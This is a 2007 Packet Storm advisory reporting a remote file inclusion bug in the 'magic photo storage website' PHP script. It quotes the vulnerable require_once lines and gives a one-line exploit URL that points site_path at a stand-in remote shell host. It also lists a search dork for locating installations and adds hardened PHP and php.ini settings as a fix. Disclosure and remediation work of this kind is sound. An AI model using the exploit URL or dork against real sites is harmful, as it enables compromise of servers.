mpsw-rfi.txt

2007-01-13T00:00:00
ID PACKETSTORM:53542
Type packetstorm
Reporter k1tk4t
Modified 2007-01-13T00:00:00

Description

########################################################################  
# magic photo storage website -- Remote File Inclusion  
# Vendor : http://www.scriptaty.net/magic-photo-storage-website.html  
# Demo Site : http://www.turnkeydemos.info/demo/picstorage/  
# Found By : k1tk4t - k1tk4t[4t]newhack.org  
# Location : Indonesia -- #newhack[dot]org @irc.dal.net  
########################################################################  
file;  
common_function.php  
  
bug;  
require_once $_config['site_path'] . '/class/session.class.php';  
require_once $_config['site_path'] . '/class/validator.class.php';  
require_once $_config['site_path'] . '/include/message.php';  
########################################################################  
exploit;  
http://localhost/include/common_function.php?_config[site_path]=http://shell  
########################################################################  
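fix (added example, not part of the original advisory and not the vendor's code);  
The require_once lines above take their base path from $_config['site_path'], and the request shown above supplies that value from the client when the file is requested directly. The sketch below puts the vulnerable form next to a hardened one; safe_include_path() and the demo directory are hypothetical names, and the containment check goes slightly beyond the advisory's own case.

```php
<?php
declare(strict_types=1);

// Vulnerable form from the advisory (common_function.php): the base path is
// read from $_config, which the advisory's request sets via the query string.
//   require_once $_config['site_path'] . '/class/session.class.php';

// Hardened form. safe_include_path() is a hypothetical helper name: the base
// must be a local directory and the target a real file inside it.
function safe_include_path(string $base, string $relative): string
{
    if (strpos($base, '://') !== false) {            // http://, ftp://, php://
        throw new RuntimeException('site_path must be a local directory');
    }
    $root = realpath($base);
    if ($root === false || !is_dir($root)) {
        throw new RuntimeException('site_path does not exist');
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $target = realpath($prefix . ltrim($relative, '/\\'));
    if ($target === false || !is_file($target)
        || strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('include target rejected');
    }
    return $target;
}

// Constructed demo tree standing in for the site root.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . uniqid('mpsw_demo_');
mkdir($root . '/class', 0700, true);
file_put_contents($root . '/class/session.class.php', "<?php // stub\n");

// In the real file the base would be fixed server-side, e.g.
// require_once safe_include_path(dirname(__DIR__), '/class/session.class.php');
$cases = [
    [$root, '/class/session.class.php'],            // legitimate include
    ['http://shell', '/class/session.class.php'],   // value from the advisory's request
    [$root, '/../../etc/passwd'],                   // resolves outside the base
];
foreach ($cases as [$base, $rel]) {
    try {
        echo 'OK   ', safe_include_path($base, $rel), PHP_EOL;
    } catch (RuntimeException $e) {
        echo 'DENY ', $base, $rel, ' (', $e->getMessage(), ')', PHP_EOL;
    }
}
unlink($root . '/class/session.class.php');
rmdir($root . '/class');
rmdir($root);
```

On PHP versions that still have them, register_globals = Off and allow_url_include = Off (allow_url_fopen = Off before PHP 5.2) remove the two conditions this class of bug usually depends on.  
########################################################################  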
Dork;  
allinurl:catalog_login.php  
########################################################################  
Thanks;  
str0ke  
xoron [www.xoron.biz]  
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159  
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,  
home_edition2001,matdhule,iFX,fusion  
and for all(friend's&enemy)  
@irc.dal.net  
#newhack[dot]org [all member&staff]  
#e-c-h-o [all member echo community]  
#asiahacker [all member asiahacker community]  
#nyubicrew [all member solpotcrew community] <-- at irc.komp-uter.org  